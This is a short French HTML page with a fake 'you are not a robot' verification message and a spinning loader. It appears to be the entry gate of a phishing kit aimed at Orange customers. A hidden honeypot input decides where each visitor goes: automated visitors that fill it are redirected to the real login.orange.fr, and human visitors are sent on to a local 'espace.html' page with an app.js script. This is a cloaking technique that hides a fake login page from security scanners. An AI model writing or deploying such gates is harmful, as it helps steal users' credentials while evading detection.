

<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page d'identification</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, sans-serif;
        }

         #overlay {
            height: 100%;
            width: 100%;
            position: fixed;
            background-color: white;
            left: 0;
            top: 0;
            z-index: 1000;
            padding: 10px;
            display: none;
        }
        html, body {
            height: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            background-color: #f4f4f4;
        }

        form {
            position: relative;
            background: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
            text-align: center;
            height: auto;
            min-height: 20vh;
        }

        button {
            padding: 10px 20px;
            border: none;
            background-color: #007bff;
            color: white;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
            margin-top: 15px;
        }

        .hone {
            position: absolute;
            left: -9999px; 
            opacity: 0;
        }

        /* From Uiverse.io by Peary74 */ 
.loader {
  position: absolute;
  top: 25%;
  left: 45%;
}

.cercle {
  position: absolute;
  background: #3f7ee8;
  border-radius: 50%;
  width: 60px;
  height: 60px;
  top: -40px;
  left: -70px;
  animation: move-up6 .4s ease-in infinite alternate-reverse;
}

.cercle:nth-child(2) {
  width: 25px;
  height: 25px;
  top: -2px;
  left: -5px;
  background: #de4032;
  animation: move-down1 .4s ease-in infinite alternate-reverse;
}

.cercle:nth-child(3) {
  width: 30px;
  height: 30px;
  top: 35px;
  left: -7px;
  background: #eeb205;
  animation: move-updown1 .4s ease-in infinite alternate-reverse;
}

.cercle:nth-child(4) {
  width: 12px;
  height: 12px;
  top: -10px;
  left: 25px;
  background: #31aa52;
  animation: move-up6 .4s ease-in infinite alternate-reverse;
}

@keyframes move-up6 {
  to {
    transform: translateY(-5px);
  }
}

@keyframes move-down1 {
  to {
    transform: translateY(5px);
  }
}

@keyframes move-updown1 {
  to {
    transform: translateY(10px);
  }

  from {
    transform: translateY(-7px);
  }
}






    </style>
</head>

<body>
     <div id="overlay">
        <span>No found</span>
    </div>
    <div class="loader">
    
        <div class="cercle">
        </div>
        <div class="cercle">
        </div>
        <div class="cercle">
        </div>
        <div class="cercle">
        </div>
      
      </div>
    <form id="login-form" onsubmit="return validateForm(event)">
        <!-- From Uiverse.io by Peary74 --> 
        <input type="text" id="hone" name="hone" class="hone" autocomplete="off">

        <span style=" font-weight: bold; font-size: 1.4rem; color: rgb(56, 51, 51);">
            ✅ Vérification réussie : vous n'êtes pas un robot
          </span>
         
          
                  <br>
        <br>
        <button type="submit">Veuillez continuer</button>
    </form>
    <script>

        


        function validateForm(e) {
            e.preventDefault(); 

            let hone = document.getElementById("hone").value;

            if (hone) {
                console.log("refusé.");
                window.location.href = "https://login.orange.fr/";
                return;
            }else{
                console.log("accepté.");
                window.location.href = "./espace.html";
            }
            

        }
    </script>

    <script src="./app.js"></script>
</body>

</html>